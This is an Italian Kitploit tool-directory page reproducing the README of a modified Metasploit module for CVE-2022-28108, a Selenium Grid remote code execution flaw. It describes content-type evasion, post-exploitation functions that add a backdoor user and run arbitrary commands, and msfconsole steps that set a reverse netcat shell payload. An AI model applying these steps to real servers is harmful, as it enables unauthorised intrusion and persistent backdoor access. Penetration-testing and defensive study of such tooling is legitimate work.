Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-28108 — Modulo Metasploit modificato che sfrutta CVE-2022-28108 (Selenium Grid RCE) con evasione del content-type e funzioni post-sfruttamento per esecuzione comandi e creazione utente backdoor. | Kitploit
Strumenti/GitHubGitHub/zeroethical/cve-2022-28108
Framework di ExploitAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPost-ExploitPenetration TestingRed TeamingSviluppo Payload
GitHubzeroethical/cve-2022-28108

CVE-2022-28108

Modulo Metasploit modificato che sfrutta CVE-2022-28108 (Selenium Grid RCE) con evasione del content-type e funzioni post-sfruttamento per esecuzione comandi e creazione utente backdoor.

1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

Selenium Chrome RCE Exploit (Esteso)

Questo repository contiene una versione modificata di un modulo Metasploit che sfrutta una vulnerabilità di esecuzione remota di codice in versioni precedenti di Selenium Server (Grid).

Si prega di leggere attentamente questo README prima di utilizzare questo codice.


Riconoscimento del Codice Originale:

Questo modulo si basa sull'eccellente lavoro degli autori originali del modulo Metasploit per CVE-2022-28108. La funzionalità principale dello sfruttamento della vulnerabilità di Selenium Server rimane in gran parte basata sulla loro implementazione. Riconosciamo e apprezziamo il loro contributo alla comunità della sicurezza.

  • Modulo Metasploit Originale: Puoi trovare il modulo originale all'interno del Metasploit Framework.
  • Autori Originali: Gli autori originali sono accreditati all'interno del modulo stesso (tipicamente nella sezione 'Author'). Si prega di fare riferimento al modulo originale per i loro nomi specifici.

Vulnerabilità Sfruttata:

Questo modulo prende di mira CVE-2022-28108, una vulnerabilità di Cross-Site Request Forgery (CSRF) in Selenium Server (Grid) precedente alla versione 4.0.0-alpha-7. Questa vulnerabilità sorge perché il server consente tipi di contenuto non JSON (come text/plain, application/x-www-form-urlencoded e multipart/form-data) per determinate richieste. Un attaccante può sfruttare questo per inviare richieste malevole, portando all'esecuzione remota di codice (RCE) sul server.

Come Funziona il Codice Originale:

Il modulo Metasploit originale sfrutta questa vulnerabilità inviando una richiesta POST costruita ad hoc all'endpoint /wd/hub/session del Selenium Server vulnerabile. Questa richiesta utilizza un Content-Type non JSON (in particolare text/plain) e include configurazioni malevole all'interno di goog:chromeOptions delle capacità del browser desiderate. Questo permette a un attaccante di specificare un binario arbitrario (come /usr/bin/python3) e argomenti da eseguire sul server quando viene avviata una nuova sessione del browser.

Modifiche e Miglioramenti in Questa Versione:

Questo repository contiene una versione modificata del modulo Metasploit originale. Le modifiche principali includono:

  • Evasione del Content-Type: Il modulo modificato tenta di sfruttare la vulnerabilità inviando la richiesta malevola con diversi header Content-Type. Questo include text/plain, application/x-www-form-urlencoded e multipart/form-data. Ciò viene fatto per potenzialmente bypassare meccanismi di filtraggio o rilevamento di base che potrebbero cercare un Content-Type specifico.
  • Funzione execute_post_exploitation: È stata aggiunta una nuova funzione execute_post_exploitation(session_response). Questa funzione viene chiamata dopo lo sfruttamento riuscito e mira a eseguire attività di post-sfruttamento di base. Nell'implementazione attuale, include:
    • Tentativo di aggiungere un utente backdoor al sistema.
    • Raccolta di informazioni di base sul sistema (username, ID, versione del kernel).
  • Funzione execute_command_on_target: È stata aggiunta un'altra nuova funzione execute_command_on_target(command). Questa funzione permette l'esecuzione di comandi arbitrari sul sistema di destinazione dopo uno sfruttamento riuscito. Viene utilizzata all'interno della funzione execute_post_exploitation e può essere estesa per ulteriori attività di post-sfruttamento.

Differenze Chiave Evidenziate:

La differenza principale risiede nel metodo exploit e nell'aggiunta delle due nuove funzioni.

  • Metodo exploit Originale: Focalizzato sull'invio di una singola richiesta con Content-Type: text/plain.
  • Metodo exploit Modificato: Itera attraverso diversi valori Content-Type, tentando lo sfruttamento con ciascuno. In caso di sfruttamento riuscito, chiama la funzione execute_post_exploitation.
  • Nuove Funzioni: Le funzioni execute_post_exploitation e execute_command_on_target sono interamente nuove aggiunte a questa versione modificata, fornendo capacità estese di post-sfruttamento.

Come Usare il Modulo Modificato:

  1. Assicurati di avere installato il Metasploit Framework.
  2. Salva il codice modificato: Salva il codice Ruby fornito come file .rb (es. selenium_rce_extended.rb).
  3. Posiziona il modulo nella directory dei moduli di Metasploit: Copia il file salvato nella directory appropriata dei moduli di Metasploit. Di solito si trova in /usr/share/metasploit-framework/modules/exploits/ o ~/.msf4/modules/exploits/. Fai riferimento alla tua installazione di Metasploit per la posizione esatta.
  4. Avvia la console di Metasploit: Apri un terminale ed esegui msfconsole.
  5. Carica il modulo: Nella console di Metasploit, usa il comando use exploit/selenium_rce_extended (o il percorso in cui hai salvato il file se lo hai inserito in una sottodirectory).
  6. Configura il target: Imposta l'indirizzo IP e la porta del Selenium Server vulnerabile:
    root@kitploit:~
    msf6 exploit(selenium_rce_extended) > set RHOSTS <ip_target>
    msf6 exploit(selenium_rce_extended) > set RPORT <porta_target>
    
    (La porta predefinita per Selenium Grid è spesso 4444).
  7. Imposta il payload: Scegli un payload da eseguire sul sistema di destinazione. Ad esempio, per ottenere una reverse shell:
    root@kitploit:~
    msf6 exploit(selenium_rce_extended) > set PAYLOAD cmd/unix/reverse_netcat
    msf6 exploit(selenium_rce_extended) > set LHOST <tuo_ip>
    msf6 exploit(selenium_rce_extended) > set LPORT <tua_porta>
    

Considerazioni Importanti (Avvertenze):

  • Usa questo codice in modo responsabile ed etico. Questo modulo è fornito a scopo educativo e per consentire ai professionisti della sicurezza di testare e valutare la sicurezza dei propri sistemi.
  • Assicurati di avere il permesso esplicito di testare il sistema di destinazione. L'uso non autorizzato di questo codice è illegale e non etico.
  • Comprendi i rischi coinvolti. Lo sfruttamento delle vulnerabilità può avere conseguenze indesiderate e potrebbe destabilizzare i sistemi di destinazione.
  • Testa in ambienti isolati e controllati. Esegui sempre i test in ambienti in cui hai il pieno controllo e puoi mitigare eventuali danni potenziali.
  • Le funzioni di post-sfruttamento sono esempi di base. Potresti doverle modificare o estendere in base alle tue esigenze specifiche e all'ambiente di destinazione.

Esclusione di Responsabilità:

L'autore/ gli autori di questo codice modificato non sono responsabili per qualsiasi uso improprio o danno causato dall'utilizzo di questo modulo. Utilizzando questo codice, accetti di assumerti la piena responsabilità delle tue azioni.

Licenza:

Questo codice modificato è probabilmente coperto dalla stessa licenza del Metasploit Framework originale (tipicamente la MSF License). Si prega di fare riferimento alla licenza originale del Metasploit Framework per i dettagli.

Contributi:

Contributi e miglioramenti a questo modulo sono benvenuti. Sentiti libero di inviare pull request con correzioni di bug, miglioramenti o nuove funzionalità.

Ringraziamenti:

Ribadiamo la nostra gratitudine agli autori originali del modulo Metasploit per CVE-2022-28108. Il loro lavoro costituisce la base di questo modulo modificato.

Scarica lo strumento
  • Esegui l'exploit: Esegui il modulo con il comando exploit.